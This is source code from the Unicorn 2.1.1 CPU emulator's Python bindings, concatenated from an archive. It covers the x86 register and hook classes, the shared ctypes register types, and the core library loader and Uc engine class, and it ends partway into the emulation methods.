""" # @author elicn from typing import Any, Callable, Sequence, Tuple import ctypes # traditional unicorn imports from unicorn import x86_const as const from unicorn.unicorn_const import UC_ERR_ARG, UC_HOOK_INSN # newly introduced unicorn imports from ..unicorn import Uc, UcError, uccallback from .types import uc_engine, UcTupledReg, UcReg128, UcReg256, UcReg512 X86MMRReg = Tuple[int, int, int, int] X86MSRReg = Tuple[int, int] X86FPReg = Tuple[int, int] HOOK_INSN_IN_CFUNC = ctypes.CFUNCTYPE(ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_void_p) HOOK_INSN_OUT_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32, ctypes.c_void_p) HOOK_INSN_SYSCALL_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_void_p) HOOK_INSN_CPUID_CFUNC = ctypes.CFUNCTYPE(ctypes.c_uint32, uc_engine, ctypes.c_void_p) class UcRegMMR(UcTupledReg[X86MMRReg]): """Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. """ _fields_ = ( ('selector', ctypes.c_uint16), # not used by GDTR and IDTR ('base', ctypes.c_uint64), # handle 32 or 64 bit CPUs ('limit', ctypes.c_uint32), ('flags', ctypes.c_uint32) # not used by GDTR and IDTR ) class UcRegMSR(UcTupledReg[X86MSRReg]): """Intel Model Specific Register """ _fields_ = ( ('rid', ctypes.c_uint32), ('val', ctypes.c_uint64) ) @property def value(self) -> int: return self.val class UcRegFPR(UcTupledReg[X86FPReg]): """Intel Floating Point Register """ _fields_ = ( ('mantissa', ctypes.c_uint64), ('exponent', ctypes.c_uint16) ) class UcIntel(Uc): """Unicorn subclass for Intel architecture. """ REG_RANGE_MMR = ( const.UC_X86_REG_IDTR, const.UC_X86_REG_GDTR, const.UC_X86_REG_LDTR, const.UC_X86_REG_TR ) REG_RANGE_FP = range(const.UC_X86_REG_FP0, const.UC_X86_REG_FP7 + 1) REG_RANGE_XMM = range(const.UC_X86_REG_XMM0, const.UC_X86_REG_XMM31 + 1) REG_RANGE_YMM = range(const.UC_X86_REG_YMM0, const.UC_X86_REG_YMM31 + 1) REG_RANGE_ZMM = range(const.UC_X86_REG_ZMM0, const.UC_X86_REG_ZMM31 + 1) def hook_add(self, htype: int, callback: Callable, user_data: Any = None, begin: int = 1, end: int = 0, aux1: int = 0, aux2: int = 0) -> int: if htype != UC_HOOK_INSN: return super().hook_add(htype, callback, user_data, begin, end, aux1, aux2) insn = ctypes.c_int(aux1) def __hook_insn_in(): @uccallback(self, HOOK_INSN_IN_CFUNC) def __hook_insn_in_cb(uc: Uc, port: int, size: int, key: int) -> int: return callback(uc, port, size, user_data) return __hook_insn_in_cb def __hook_insn_out(): @uccallback(self, HOOK_INSN_OUT_CFUNC) def __hook_insn_out_cb(uc: Uc, port: int, size: int, value: int, key: int): callback(uc, port, size, value, user_data) return __hook_insn_out_cb def __hook_insn_syscall(): @uccallback(self, HOOK_INSN_SYSCALL_CFUNC) def __hook_insn_syscall_cb(uc: Uc, key: int): callback(uc, user_data) return __hook_insn_syscall_cb def __hook_insn_cpuid(): @uccallback(self, HOOK_INSN_CPUID_CFUNC) def __hook_insn_cpuid_cb(uc: Uc, key: int) -> int: return callback(uc, user_data) return __hook_insn_cpuid_cb handlers = { const.UC_X86_INS_IN : __hook_insn_in, const.UC_X86_INS_OUT : __hook_insn_out, const.UC_X86_INS_SYSCALL : __hook_insn_syscall, const.UC_X86_INS_SYSENTER : __hook_insn_syscall, const.UC_X86_INS_CPUID : __hook_insn_cpuid } handler = handlers.get(insn.value) if handler is None: raise UcError(UC_ERR_ARG) fptr = handler() return getattr(self, '_Uc__do_hook_add')(htype, fptr, begin, end, insn) @staticmethod def __select_reg_class(reg_id: int): """Select class for special architectural registers. 
""" reg_class = ( (UcIntel.REG_RANGE_MMR, UcRegMMR), (UcIntel.REG_RANGE_FP, UcRegFPR), (UcIntel.REG_RANGE_XMM, UcReg128), (UcIntel.REG_RANGE_YMM, UcReg256), (UcIntel.REG_RANGE_ZMM, UcReg512) ) return next((cls for rng, cls in reg_class if reg_id in rng), None) def reg_read(self, reg_id: int, aux: Any = None): # select register class for special cases reg_cls = UcIntel.__select_reg_class(reg_id) if reg_cls is None: # backward compatibility: msr read through reg_read if reg_id == const.UC_X86_REG_MSR: if type(aux) is not int: raise UcError(UC_ERR_ARG) value = self.msr_read(aux) else: value = super().reg_read(reg_id, aux) else: value = self._reg_read(reg_id, reg_cls) return value def reg_write(self, reg_id: int, value) -> None: # select register class for special cases reg_cls = UcIntel.__select_reg_class(reg_id) if reg_cls is None: # backward compatibility: msr write through reg_write if reg_id == const.UC_X86_REG_MSR: if type(value) is not tuple or len(value) != 2: raise UcError(UC_ERR_ARG) self.msr_write(*value) return super().reg_write(reg_id, value) else: self._reg_write(reg_id, reg_cls, value) def msr_read(self, msr_id: int) -> int: return self._reg_read(const.UC_X86_REG_MSR, UcRegMSR, msr_id) def msr_write(self, msr_id: int, value: int) -> None: self._reg_write(const.UC_X86_REG_MSR, UcRegMSR, (msr_id, value)) def reg_read_batch(self, reg_ids: Sequence[int]) -> Tuple: reg_types = [UcIntel.__select_reg_class(rid) or self._DEFAULT_REGTYPE for rid in reg_ids] return self._reg_read_batch(reg_ids, reg_types) __all__ = ['UcRegMMR', 'UcRegMSR', 'UcRegFPR', 'UcIntel'] ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/arch/types.py�������������������������������������0000664�0000000�0000000�00000004470�14675241067�0024707�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������"""Common types and structures. """ # @author elicn from abc import abstractmethod from typing import Generic, Tuple, TypeVar import ctypes uc_err = ctypes.c_int uc_engine = ctypes.c_void_p uc_context = ctypes.c_void_p uc_hook_h = ctypes.c_size_t VT = TypeVar('VT', bound=Tuple[int, ...]) class UcReg(ctypes.Structure): """A base class for composite registers. This class is meant to be inherited, not instantiated directly. """ @property @abstractmethod def value(self): """Get register value. """ pass @classmethod @abstractmethod def from_value(cls, value): """Create a register instance from a given value. """ pass class UcTupledReg(UcReg, Generic[VT]): """A base class for registers whose values are represented as a set of fields. This class is meant to be inherited, not instantiated directly. 
""" @property def value(self) -> VT: return tuple(getattr(self, fname) for fname, *_ in self.__class__._fields_) # type: ignore @classmethod def from_value(cls, value: VT): assert type(value) is tuple and len(value) == len(cls._fields_) return cls(*value) class UcLargeReg(UcReg): """A base class for large registers that are internally represented as an array of multiple qwords. This class is meant to be inherited, not instantiated directly. """ qwords: ctypes.Array @property def value(self) -> int: return sum(qword << (64 * i) for i, qword in enumerate(self.qwords)) @classmethod def from_value(cls, value: int): assert type(value) is int mask = (1 << 64) - 1 size = cls._fields_[0][1]._length_ return cls(tuple((value >> (64 * i)) & mask for i in range(size))) class UcReg128(UcLargeReg): """Large register holding a 128-bit value. """ _fields_ = [('qwords', ctypes.c_uint64 * 2)] class UcReg256(UcLargeReg): """Large register holding a 256-bit value. """ _fields_ = [('qwords', ctypes.c_uint64 * 4)] class UcReg512(UcLargeReg): """Large register holding a 512-bit value. """ _fields_ = [('qwords', ctypes.c_uint64 * 8)] __all__ = ['uc_err', 'uc_engine', 'uc_context', 'uc_hook_h', 'UcReg', 'UcTupledReg', 'UcLargeReg', 'UcReg128', 'UcReg256', 'UcReg512'] ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/unicorn.py����������������������������������������0000664�0000000�0000000�00000123165�14675241067�0024306�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������"""New and improved Unicorn Python bindings by elicn based on Nguyen Anh Quynnh's work """ from __future__ import annotations from typing import TYPE_CHECKING, Any, Callable, Iterable, Iterator, Mapping, MutableMapping, Optional, Sequence, Tuple, Type, TypeVar import ctypes import functools import weakref from unicorn import unicorn_const as uc from .arch.types import uc_err, uc_engine, uc_context, uc_hook_h, UcReg # __version__ = f'{uc.UC_VERSION_MAJOR}.{uc.UC_VERSION_MINOR}.{uc.UC_VERSION_PATCH}' class _uc_mem_region(ctypes.Structure): _fields_ = ( ('begin', ctypes.c_uint64), ('end', ctypes.c_uint64), ('perms', ctypes.c_uint32), ) @property def value(self) -> Tuple[int, int, int]: return tuple(getattr(self, fname) for fname, *_ in self._fields_) class uc_tb(ctypes.Structure): """"TranslationBlock """ _fields_ = ( ('pc', ctypes.c_uint64), ('icount', ctypes.c_uint16), ('size', ctypes.c_uint16) ) def __load_uc_lib() -> ctypes.CDLL: from pathlib import Path, PurePath import inspect import os import sys loaded_dlls = set() def __load_win_support(path: Path) -> None: # Windows DLL in dependency order all_dlls = ( 'libwinpthread-1.dll', 'libgcc_s_seh-1.dll', 'libgcc_s_dw2-1.dll' ) for dllname in all_dlls: if dllname not in loaded_dlls: lib_file = path / dllname if str(path.parent) == '.' 
unicorn-2.1.1/bindings/python/unicorn/unicorn_py3/unicorn.py

"""New and improved Unicorn Python bindings by elicn
based on Nguyen Anh Quynnh's work
"""

from __future__ import annotations
from typing import TYPE_CHECKING, Any, Callable, Iterable, Iterator, Mapping, MutableMapping, Optional, Sequence, Tuple, Type, TypeVar

import ctypes
import functools
import weakref

from unicorn import unicorn_const as uc
from .arch.types import uc_err, uc_engine, uc_context, uc_hook_h, UcReg

# __version__ = f'{uc.UC_VERSION_MAJOR}.{uc.UC_VERSION_MINOR}.{uc.UC_VERSION_PATCH}'


class _uc_mem_region(ctypes.Structure):
    _fields_ = (
        ('begin', ctypes.c_uint64),
        ('end',   ctypes.c_uint64),
        ('perms', ctypes.c_uint32),
    )

    @property
    def value(self) -> Tuple[int, int, int]:
        return tuple(getattr(self, fname) for fname, *_ in self._fields_)


class uc_tb(ctypes.Structure):
    """TranslationBlock
    """

    _fields_ = (
        ('pc',     ctypes.c_uint64),
        ('icount', ctypes.c_uint16),
        ('size',   ctypes.c_uint16)
    )


def __load_uc_lib() -> ctypes.CDLL:
    from pathlib import Path, PurePath

    import inspect
    import os
    import sys

    loaded_dlls = set()

    def __load_win_support(path: Path) -> None:
        # Windows DLL in dependency order
        all_dlls = (
            'libwinpthread-1.dll',
            'libgcc_s_seh-1.dll',
            'libgcc_s_dw2-1.dll'
        )

        for dllname in all_dlls:
            if dllname not in loaded_dlls:
                lib_file = path / dllname

                if str(path.parent) == '.' or lib_file.exists():
                    try:
                        ctypes.cdll.LoadLibrary(str(lib_file))
                    except OSError:
                        continue
                    else:
                        loaded_dlls.add(dllname)

    platform = sys.platform

    # Initial attempt: load all dlls globally
    if platform in ('win32', 'cygwin'):
        __load_win_support(Path())

    def _load_lib(path: Path, lib_name: str):
        if platform in ('win32', 'cygwin'):
            __load_win_support(path)

        lib_file = path / lib_name

        try:
            return ctypes.cdll.LoadLibrary(str(lib_file))
        except OSError:
            return None

    # Loading attempts, in order
    # - user-provided environment variable
    # - pkg_resources can get us the path to the local libraries
    # - we can get the path to the local libraries by parsing our filename
    # - global load
    # - python's lib directory
    canonicals = []

    try:
        from importlib import resources

        canonicals.append(
            resources.files("unicorn") / 'lib'
        )
    except ImportError:
        try:
            import pkg_resources

            canonicals.append(
                pkg_resources.resource_filename("unicorn", 'lib')
            )
        except ImportError:
            # maybe importlib_resources, but ignore for now
            pass

    lib_locations = [
        os.getenv('LIBUNICORN_PATH'),
    ] + canonicals + [
        PurePath(inspect.getfile(__load_uc_lib)).parent / 'lib',
        '',
        r'/usr/local/lib' if sys.platform == 'darwin' else r'/usr/lib64',
    ] + [PurePath(p) / 'unicorn' / 'lib' for p in sys.path]

    # filter out None elements
    lib_locations = tuple(Path(loc) for loc in lib_locations if loc is not None)

    lib_name = {
        'cygwin': 'cygunicorn.dll',
        'darwin': 'libunicorn.2.dylib',
        'linux': 'libunicorn.so.2',
        'linux2': 'libunicorn.so.2',
        'win32': 'unicorn.dll'
    }.get(platform, "libunicorn.so")

    def __attempt_load(libname: str):
        T = TypeVar('T')

        def __pick_first_valid(it: Iterable[T]) -> Optional[T]:
            """Iterate till encountering a non-None element and return it.
            """

            return next((elem for elem in it if elem is not None), None)

        return __pick_first_valid(_load_lib(loc, libname) for loc in lib_locations)

    lib = __attempt_load(lib_name) or __attempt_load('libunicorn.so')

    if lib is None:
        raise ImportError('Failed to load the Unicorn dynamic library')

    return lib
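
# Editor's note: an illustrative sketch, not part of the original file. As the
# search order above shows, LIBUNICORN_PATH takes precedence over the bundled
# library, so a custom core build can be selected before importing the package;
# the path used here is an arbitrary assumption.

def _custom_lib_sketch():
    import os

    # must be set before `import unicorn` triggers __load_uc_lib()
    os.environ['LIBUNICORN_PATH'] = '/opt/unicorn-custom/lib'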
def __set_lib_prototypes(lib: ctypes.CDLL) -> None:
    """Set up library functions prototypes.

    Args:
        lib: unicorn library instance
    """

    def __set_prototype(fname: str, restype: Type[ctypes._CData], *argtypes: Type[ctypes._CData]) -> None:
        func: Optional[ctypes._FuncPointer] = getattr(lib, fname, None)

        if func is None:
            raise ImportError('Failed to setup function prototypes; make sure you have cleaned your unicorn1 installation')

        func.restype = restype
        func.argtypes = argtypes

    __set_prototype('uc_version', ctypes.c_uint, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int))
    __set_prototype('uc_arch_supported', ctypes.c_bool, ctypes.c_int)
    __set_prototype('uc_open', uc_err, ctypes.c_uint, ctypes.c_uint, ctypes.POINTER(uc_engine))
    __set_prototype('uc_close', uc_err, uc_engine)
    __set_prototype('uc_strerror', ctypes.c_char_p, uc_err)
    __set_prototype('uc_errno', uc_err, uc_engine)
    __set_prototype('uc_reg_read', uc_err, uc_engine, ctypes.c_int, ctypes.c_void_p)
    __set_prototype('uc_reg_write', uc_err, uc_engine, ctypes.c_int, ctypes.c_void_p)
    __set_prototype('uc_reg_read_batch', uc_err, uc_engine, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_void_p), ctypes.c_int)
    __set_prototype('uc_mem_read', uc_err, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t)
    __set_prototype('uc_mem_write', uc_err, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t)
    __set_prototype('uc_emu_start', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_size_t)
    __set_prototype('uc_emu_stop', uc_err, uc_engine)
    __set_prototype('uc_hook_del', uc_err, uc_engine, uc_hook_h)
    __set_prototype('uc_mmio_map', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p)
    __set_prototype('uc_mem_map', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32)
    __set_prototype('uc_mem_map_ptr', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_void_p)
    __set_prototype('uc_mem_unmap', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_size_t)
    __set_prototype('uc_mem_protect', uc_err, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32)
    __set_prototype('uc_query', uc_err, uc_engine, ctypes.c_uint32, ctypes.POINTER(ctypes.c_size_t))
    __set_prototype('uc_context_alloc', uc_err, uc_engine, ctypes.POINTER(uc_context))
    __set_prototype('uc_free', uc_err, ctypes.c_void_p)
    __set_prototype('uc_context_save', uc_err, uc_engine, uc_context)
    __set_prototype('uc_context_restore', uc_err, uc_engine, uc_context)
    __set_prototype('uc_context_size', ctypes.c_size_t, uc_engine)
    __set_prototype('uc_context_reg_read', uc_err, uc_context, ctypes.c_int, ctypes.c_void_p)
    __set_prototype('uc_context_reg_write', uc_err, uc_context, ctypes.c_int, ctypes.c_void_p)
    __set_prototype('uc_context_reg_read_batch', uc_err, uc_context, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_void_p), ctypes.c_int)
    __set_prototype('uc_context_free', uc_err, uc_context)
    __set_prototype('uc_mem_regions', uc_err, uc_engine, ctypes.POINTER(ctypes.POINTER(_uc_mem_region)), ctypes.POINTER(ctypes.c_uint32))

    # https://bugs.python.org/issue42880
    __set_prototype('uc_hook_add', uc_err, uc_engine, ctypes.POINTER(uc_hook_h), ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_uint64, ctypes.c_uint64)
    __set_prototype('uc_ctl', uc_err, uc_engine, ctypes.c_int)


uclib = __load_uc_lib()
__set_lib_prototypes(uclib)

# native hook callback signatures
HOOK_INTR_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint32, ctypes.c_void_p)
HOOK_CODE_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_uint32, ctypes.c_void_p)
# native hook callback signatures
HOOK_INTR_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint32, ctypes.c_void_p)
HOOK_CODE_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_uint32, ctypes.c_void_p)
HOOK_MEM_INVALID_CFUNC = ctypes.CFUNCTYPE(ctypes.c_bool, uc_engine, ctypes.c_int, ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p)
HOOK_MEM_ACCESS_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_int, ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p)
HOOK_INSN_INVALID_CFUNC = ctypes.CFUNCTYPE(ctypes.c_bool, uc_engine, ctypes.c_void_p)
HOOK_EDGE_GEN_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.POINTER(uc_tb), ctypes.POINTER(uc_tb), ctypes.c_void_p)
HOOK_TCG_OPCODE_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint32, ctypes.c_void_p)

# mmio callback signatures
MMIO_READ_CFUNC = ctypes.CFUNCTYPE(ctypes.c_uint64, uc_engine, ctypes.c_uint64, ctypes.c_uint, ctypes.c_void_p)
MMIO_WRITE_CFUNC = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_uint, ctypes.c_uint64, ctypes.c_void_p)


class UcError(Exception):
    """Unicorn base exception.

    Error context is specified through `errno` and `args`.
    """

    def __init__(self, errno: int, *args):
        super().__init__(*args)

        self.errno = errno

    def __str__(self) -> str:
        return uclib.uc_strerror(self.errno).decode('ascii')


def uc_version() -> Tuple[int, int, int]:
    """Retrieve Unicorn library version.

    Returns: a tuple containing major, minor and a combined version number
    """
    major = ctypes.c_int()
    minor = ctypes.c_int()

    combined = uclib.uc_version(
        ctypes.byref(major),
        ctypes.byref(minor)
    )

    return (major.value, minor.value, combined)


def version_bind() -> Tuple[int, int, int]:
    """Retrieve Unicorn bindings version.

    Returns: a tuple containing major, minor and a combined version number
    """
    major = uc.UC_API_MAJOR
    minor = uc.UC_API_MINOR

    combined = (major << 8) + minor

    return (major, minor, combined)


def uc_arch_supported(atype: int) -> bool:
    """Check whether Unicorn library supports a particular arch.
    """
    return bool(uclib.uc_arch_supported(atype))


def debug() -> str:
    """Get verbose version string.
    """
    archs = (
        ('arm',     uc.UC_ARCH_ARM),
        ('arm64',   uc.UC_ARCH_ARM64),
        ('mips',    uc.UC_ARCH_MIPS),
        ('x86',     uc.UC_ARCH_X86),
        ('ppc',     uc.UC_ARCH_PPC),
        ('sparc',   uc.UC_ARCH_SPARC),
        ('m68k',    uc.UC_ARCH_M68K),
        ('riscv',   uc.UC_ARCH_RISCV),
        ('s390x',   uc.UC_ARCH_S390X),
        ('tricore', uc.UC_ARCH_TRICORE)
    )

    all_archs = ''.join(f'-{name}' for name, atype in archs if uc_arch_supported(atype))
    lib_maj, lib_min, _ = uc_version()
    bnd_maj, bnd_min, _ = version_bind()

    return f'python-{all_archs}-c{lib_maj}.{lib_min}-b{bnd_maj}.{bnd_min}'
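# The bindings refuse to run against a core whose major.minor version does not
# match (see Uc.__new__ below). An illustrative startup sanity check might
# look like this (a hedged sketch, not part of the bindings):
#
#     lib_maj, lib_min, _ = uc_version()
#     bnd_maj, bnd_min, _ = version_bind()
#     if (lib_maj, lib_min) != (bnd_maj, bnd_min):
#         raise RuntimeError(f'core {lib_maj}.{lib_min} does not match bindings {bnd_maj}.{bnd_min}')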
if TYPE_CHECKING:
    # _FuncPointer is not recognized at runtime; use it only for type annotation
    _CFP = TypeVar('_CFP', bound=ctypes._FuncPointer)


def uccallback(uc: Uc, functype: Type[_CFP]):
    """Unicorn callback decorator.

    Wraps a Python function meant to be dispatched by Unicorn as a hook callback.
    The function call is wrapped with an exception guard to catch and record
    exceptions thrown during hook handling.

    If an exception occurs, it is saved to the Uc object and emulation is stopped.
    """

    def decorate(func) -> _CFP:
        @functools.wraps(func)
        def wrapper(handle: Uc, *args, **kwargs):
            try:
                return func(uc, *args, **kwargs)
            except Exception as e:
                # If multiple hooks raise exceptions, just use the first one
                if uc._hook_exception is None:
                    uc._hook_exception = e

                uc.emu_stop()

        return ctypes.cast(functype(wrapper), functype)

    return decorate


class RegStateManager:
    """Registers state manager.

    Designed as a mixin class; not to be instantiated directly.
    Some methods must be implemented by mixin instances.
    """

    _DEFAULT_REGTYPE = ctypes.c_uint64

    def _do_reg_read(self, reg_id: int, reg_obj) -> int:
        """Private register read implementation.
        Must be implemented by the mixin object
        """
        raise NotImplementedError

    def _do_reg_write(self, reg_id: int, reg_obj) -> int:
        """Private register write implementation.
        Must be implemented by the mixin object
        """
        raise NotImplementedError

    def _do_reg_read_batch(self, reglist, vallist, count) -> int:
        """Private batch register read implementation.
        Must be implemented by the mixin object
        """
        raise NotImplementedError

    def _do_reg_write_batch(self, reglist, count) -> int:
        """Private batch register write implementation.
        Must be implemented by the mixin object
        """
        raise NotImplementedError

    @staticmethod
    def __get_reg_read_arg(regtype: Type, *args):
        return regtype(*args)

    @staticmethod
    def __get_reg_write_arg(regtype: Type, value):
        return regtype.from_value(value) if issubclass(regtype, UcReg) else regtype(value)

    def _reg_read(self, reg_id: int, regtype: Type, *args):
        """Register read helper method.
        """
        reg = self.__get_reg_read_arg(regtype, *args)
        status = self._do_reg_read(reg_id, ctypes.byref(reg))

        if status != uc.UC_ERR_OK:
            raise UcError(status, reg_id)

        return reg.value

    def _reg_write(self, reg_id: int, regtype: Type, value) -> None:
        """Register write helper method.
        """
        reg = self.__get_reg_write_arg(regtype, value)
        status = self._do_reg_write(reg_id, ctypes.byref(reg))

        if status != uc.UC_ERR_OK:
            raise UcError(status, reg_id)

    def _reg_read_batch(self, reg_ids: Sequence[int], reg_types: Sequence[Type]) -> Tuple:
        """Batch register read helper method.
        """
        assert len(reg_ids) == len(reg_types)

        count = len(reg_ids)
        reg_list = (ctypes.c_int * count)(*reg_ids)
        val_list = [rtype() for rtype in reg_types]
        ptr_list = (ctypes.c_void_p * count)(*(ctypes.c_void_p(ctypes.addressof(elem)) for elem in val_list))

        status = self._do_reg_read_batch(reg_list, ptr_list, ctypes.c_int(count))

        if status != uc.UC_ERR_OK:
            raise UcError(status)

        return tuple(v.value for v in val_list)

    def reg_read(self, reg_id: int, aux: Any = None):
        """Read architectural register value.

        Args:
            reg_id : register identifier (architecture-specific enumeration)
            aux    : auxiliary data (register specific)

        Returns: register value (register-specific format)

        Raises: `UcError` in case of invalid register id or auxiliary data
        """
        return self._reg_read(reg_id, self._DEFAULT_REGTYPE)

    def reg_write(self, reg_id: int, value) -> None:
        """Write to architectural register.

        Args:
            reg_id : register identifier (architecture-specific enumeration)
            value  : value to write (register-specific format)

        Raises: `UcError` in case of invalid register id or value format
        """
        self._reg_write(reg_id, self._DEFAULT_REGTYPE, value)

    def reg_read_batch(self, reg_ids: Sequence[int]) -> Tuple:
        """Read a sequence of architectural registers.

        Args:
            reg_ids: a sequence of register identifiers (architecture-specific enumeration)

        Returns: a tuple of registers values (register-specific format)

        Raises: `UcError` in case of invalid register id
        """
        reg_types = [self._DEFAULT_REGTYPE for _ in range(len(reg_ids))]

        return self._reg_read_batch(reg_ids, reg_types)

    def reg_write_batch(self, reg_info: Sequence[Tuple[int, Any]]) -> None:
        """Write a sequence of architectural registers.

        Args:
            reg_info: a sequence of tuples consisting of register identifiers and values

        Raises: `UcError` in case of invalid register id or value format
        """
        # TODO
        ...
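# A hedged usage sketch for the register accessors, as exposed through Uc and
# UcContext instances (assumes an x86 engine `mu` and register constants from
# unicorn.x86_const; note that reg_write_batch is still a TODO above):
#
#     mu.reg_write(UC_X86_REG_ECX, 0x1234)
#     ecx = mu.reg_read(UC_X86_REG_ECX)
#     ecx, edx = mu.reg_read_batch([UC_X86_REG_ECX, UC_X86_REG_EDX])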
def ucsubclass(cls):
    """Uc subclass decorator.

    Use it to decorate user-defined Uc subclasses.

    Example:
        >>> @ucsubclass
        ... class Pegasus(Uc):
        ...     '''A Unicorn impl with wings
        ...     '''
        ...     pass
    """

    # to maintain proper inheritance for user-defined Uc subclasses, the Uc
    # base class is replaced with the appropriate Uc pre-defined subclass on
    # first instantiation.
    #
    # for example, if the Pegasus class from the example above is instantiated
    # with Intel arch and 64-bit mode, the Pegasus class will be modified to
    # inherit from UcIntel and only then Uc, instead of Uc directly. that is:
    # Pegasus -> UcIntel -> Uc -> RegStateManager -> object
    #
    # note that all Pegasus subclasses will have the same inheritance chain,
    # regardless of the arch and mode they might use to initialize.

    def __replace(seq: Tuple, item, repl) -> Tuple:
        if item not in seq:
            return seq

        i = seq.index(item)

        return seq[:i] + tuple([repl]) + seq[i + 1:]

    def __new_uc_subclass(cls, arch: int, mode: int):
        # resolve the appropriate Uc subclass
        subcls = Uc.__new__(cls, arch, mode)

        # set the resolved subclass as base class instead of Uc (if there)
        cls.__bases__ = __replace(cls.__bases__, Uc, type(subcls))

        return object.__new__(cls)

    setattr(cls, '__new__', __new_uc_subclass)

    return cls


class Uc(RegStateManager):
    """Unicorn Engine class.
    """

    @staticmethod
    def __is_compliant() -> bool:
        """Checks whether Unicorn binding version complies with Unicorn library.

        Returns: `True` if versions match, `False` otherwise
        """
        uc_maj, uc_min, _ = uc_version()
        bnd_maj, bnd_min, _ = version_bind()

        return (uc_maj, uc_min) == (bnd_maj, bnd_min)

    def __new__(cls, arch: int, mode: int, cpu: Optional[int] = None):
        # verify version compatibility with the core before doing anything
        if not Uc.__is_compliant():
            raise UcError(uc.UC_ERR_VERSION)

        import importlib

        def __uc_subclass(pkgname: str, clsname: str):
            """Use a lazy subclass instantiation to avoid importing unnecessary
            arch classes.
            """

            def __wrapped() -> Type[Uc]:
                archmod = importlib.import_module(f'.arch.{pkgname}', 'unicorn.unicorn_py3')

                return getattr(archmod, clsname)

            return __wrapped

        def __uc_generic():
            return Uc

        wrapped: Callable[[], Type[Uc]] = {
            uc.UC_ARCH_ARM     : __uc_subclass('arm', 'UcAArch32'),
            uc.UC_ARCH_ARM64   : __uc_subclass('arm64', 'UcAArch64'),
            uc.UC_ARCH_MIPS    : __uc_generic,
            uc.UC_ARCH_X86     : __uc_subclass('intel', 'UcIntel'),
            uc.UC_ARCH_PPC     : __uc_generic,
            uc.UC_ARCH_SPARC   : __uc_generic,
            uc.UC_ARCH_M68K    : __uc_generic,
            uc.UC_ARCH_RISCV   : __uc_generic,
            uc.UC_ARCH_S390X   : __uc_generic,
            uc.UC_ARCH_TRICORE : __uc_generic
        }[arch]

        subclass = wrapped()

        # return the appropriate unicorn subclass type
        return super(Uc, cls).__new__(subclass)
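    # Subclass resolution is transparent to the caller. An illustrative note
    # (a sketch, assuming the usual top-level unicorn constant exports):
    #
    #     mu = Uc(UC_ARCH_X86, UC_MODE_64)
    #     assert isinstance(mu, Uc)            # always true
    #     # type(mu).__name__ == 'UcIntel'     # arch-specific subclass
    #
    # while an arch with no specialized subclass (e.g. UC_ARCH_MIPS) yields a
    # plain Uc instance.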
    def __init__(self, arch: int, mode: int, cpu: Optional[int] = None) -> None:
        """Initialize a Unicorn engine instance.

        Args:
            arch: emulated architecture identifier (see UC_ARCH_* constants)
            mode: emulated processor mode (see UC_MODE_* constants)
            cpu: emulated cpu model (see UC_CPU_* constants) [optional]
        """
        self._arch = arch
        self._mode = mode

        # initialize the unicorn instance
        self._uch = uc_engine()
        status = uclib.uc_open(arch, mode, ctypes.byref(self._uch))

        if status != uc.UC_ERR_OK:
            self._uch = None
            raise UcError(status)

        if cpu is not None:
            self.ctl_set_cpu_model(cpu)

        # we have to keep a reference to the callbacks so they do not get gc-ed
        # see: https://docs.python.org/3/library/ctypes.html#callback-functions
        self._callbacks: MutableMapping[int, ctypes._FuncPointer] = {}
        self._mmio_callbacks: MutableMapping[Tuple[int, int], Tuple[Optional[MMIO_READ_CFUNC], Optional[MMIO_WRITE_CFUNC]]] = {}

        self._hook_exception: Optional[Exception] = None

        # create a finalizer object that will appropriately free up resources when
        # this instance undergoes garbage collection.
        self.__finalizer = weakref.finalize(self, Uc.release_handle, self._uch)

    @staticmethod
    def release_handle(uch: uc_engine) -> None:
        # this method and its arguments must not have any reference to the Uc instance being
        # destroyed. namely, this method cannot be a bound method.
        if uch:
            try:
                status = uclib.uc_close(uch)

            # _uc might be pulled from under our feet
            except:
                pass

            else:
                if status != uc.UC_ERR_OK:
                    raise UcError(status)

    ###########################
    #  Emulation controllers  #
    ###########################

    def emu_start(self, begin: int, until: int, timeout: int = 0, count: int = 0) -> None:
